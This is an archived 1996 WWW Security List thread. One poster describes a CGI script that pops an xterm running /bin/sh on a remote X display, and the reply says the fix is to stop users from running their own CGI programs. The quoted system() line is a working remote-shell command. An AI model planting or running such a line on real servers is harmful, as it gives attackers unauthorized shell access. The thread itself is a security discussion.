[3668] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Mark G. Scheuern)
Tue Dec 3 16:44:09 1996
Date: Tue, 3 Dec 1996 14:19:59 -0500 (EST)
From: "Mark G. Scheuern" <mgscheue@Oakland.edu>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu
The fix is not to allow such a script. It's a well-known fact that
it's both possible and easy to write CGI programs that do all sorts of
evil things, which is why it's a bad idea to allow users to put their
own CGI programs on a server.

Mark

On Tue, 3 Dec 1996, Andrea Di Fabio wrote:
> I was experimenting with cgi scripts when I came up with this idea:
>
> What if I have a cgi script which does the following:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
> I can now pop an xterm on my display as nobody.
> This way any user can gain access to the nobody account and
> have fun with it...
>
> Has this been discussed anywhere?
> Is there a fix out there?
>
> fabio.